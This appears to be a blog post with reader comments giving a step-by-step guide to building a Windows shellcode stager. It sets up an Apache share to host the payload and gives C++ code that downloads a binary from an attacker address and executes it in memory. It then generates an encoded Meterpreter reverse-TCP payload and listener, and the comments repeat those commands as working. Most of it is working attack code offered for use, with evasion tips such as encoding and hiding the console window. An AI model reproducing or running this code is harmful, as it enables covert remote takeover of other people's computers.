control – respect to armitage1989

This is not an original idea.  please view http://www.securitytube.net/video/2908 and pay respect to Armitage1989

apache server set up

1. Set up a share folder.

mkdir /var/www/share

chmod -R 755 /var/www/share/

chown -R www-data:www-data /var/www/share/

To veiw if sharing type
ls -la /var/www/ | grep share

#########################

2. Start web server

service apache2 start

To shut down simply replace start with stop.

##########################

3. If not installed

apt-get install apache2

##########################

4. Copy files to the share

cp /root/.msf4/data/exploits/* /var/www/share/
–> * was a wildcard that mean I want to select all the folder contents

###########################

5. Access the file from another machine

http://(servers ip)/share

#############################

please watch http://www.securitytube.net/video/2908

Armitage1989 – created the c++ code which was originaly posted at http://pastebin.com/u/armitage1989

down load Dev-C++4.9.9.2 for windows http://www.bloodshed.net/dev/devcpp.html

1. Create new project / Windows Application OK Save location to were you like.
2. Delete all in the development window and paste in the code bellow.
3. Under project window right click on your project and click Project Options (or press Alt+p)
4. under Parameters tab paste in under Linker -lwininet press OK
4. Compile save location to were you like.

Code copy bellow and paste

//include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
#include <windows.h>
#include<iostream>
#include<cstring>
#include<Wininet.h>
using namespace std;
//this is a buffer with shellcode data in .bss section
unsigned char DataReceived[500];
int main(){
int i;
//this configure a HTTP agent to surf
HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
//if for validate connection.
if(!connect){
cout<<"Connection Failed or Syntax error";
return 0;
}
//Open a malicious url
HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);

//this check the handler for URL
if ( !OpenAddress )
{
DWORD ErrorNum = GetLastError();
cout<<"Failed to open URL \nError No: "<<ErrorNum;
InternetCloseHandle(connect);
return 0;
}

DWORD NumberOfBytesRead = 0;

//this recovery a file on server and save data into DataReceived
while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
{
//this print the data in format \x00 you can delete this routine
for(i=0;i<sizeof DataReceived; i++ ){

printf("\\x%02x",DataReceived[i]);

}
/*this routine is a other implementattion of shellcode-test but in this routine i use  __asm () directive for call asm intrucctions.
1)first i store a pointer to buffer in EAX register
2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
3)the ret instruction put the value of esp+4 into eip and pass the execution.
4)finally the shellcode in DataReceived is executed
5)all handler is closed.
NOTA:
you can put a nopsled before shellcode for estabilish execution .
use freeconsole for hidden a Dos Windows
*/
__asm ("lea _DataReceived, %eax");
__asm ("push %eax");
__asm ("ret");
}

InternetCloseHandle(OpenAddress);
InternetCloseHandle(connect);

return 0;
}

############################

please watch http://www.securitytube.net/video/2908

start msfconsole

use multi/handler
set windows/meterpreter/reverse_tcp lhost (ip address) lport (port of choice)
exploit

open new console window and

msfpayload windows/meterpreter/reverse_tcp LHOST=ip address LPORT=port of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b ‘\x00\x0a\x0d’ -c 1 x>/var/www/share/your-file.bin

once the exe is run on the machine the Meterpreter should report a session

meterpreter > execute -f cmd.exe -c
Process 2508 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

Advertisements

2 thoughts on “control – respect to armitage1989

  1. Under script change ip address and location to share if required? “http://192.168.1.2/share/your-file.bin”

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4445 of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b ‘\x00\x0a\x0d’ -c 1 x>/var/www/share/your-file.bin

    use multi/handler
    set windows/meterpreter/reverse_tcp lhost 192.168.1.2 lport 4445
    exploit

  2. Update 100% works

    msfpayload windows/meterpreter/reverse_tcp LHOST=ip-address LPORT=4445 of choice R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b ‘\x00\x0a\x0d’ -c 1 x>/var/www/share/myexploit.bin

    use multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost IP Address
    set lport 4445
    exploit

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s